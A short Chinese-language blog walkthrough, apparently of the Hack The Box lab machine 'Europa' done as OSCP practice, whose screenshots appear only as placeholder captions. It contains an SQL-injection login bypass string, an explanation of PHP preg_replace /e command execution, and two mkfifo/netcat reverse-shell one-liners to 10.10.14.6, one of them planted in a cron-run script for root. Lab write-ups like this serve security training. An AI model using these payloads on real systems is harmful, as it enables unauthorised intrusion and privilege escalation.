oscp——htb——Europa

0x00 前言

在这里插入图片描述

0x01 信息收集

在这里插入图片描述
这里访问之后看到默认页面,按照htb,就是要绑域名,vul就扫目录
在这里插入图片描述

0x02 Web——Webshell

访问admin-portal.europacorp.htb
在这里插入图片描述
这里搜了一下没啥漏洞,一般这种都是万能密码进去

admin@europacorp.htb' or '1'='1

进入后台
在这里插入图片描述

这里看到一个vpn设置,涉及到一个php的preg_replace的漏洞,就是说正则表达式包含/e的时候就可以进行命令执行

在这里插入图片描述
反弹shell,注意编码,我这里直接弹/bin/bash就不需要去获取pty

rm+/tmp/f%3b+mkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc++10.10.14.6+1234+>/tmp/f

在这里插入图片描述

0x03 Webshell——Rootshell

这里用探测脚本可以看到有计划任务
在这里插入图片描述
看一看这个文件
在这里插入图片描述
接着跟踪到/var/www/cmd/logcleared.sh

发现不存在,那我们自己构造

echo "rm /tmp/f; mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc  10.10.14.6 4321 >/tmp/f" >logcleared.sh 
chmod 777 logcleared.sh

过一会儿就会拿到一个shell
在这里插入图片描述

相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页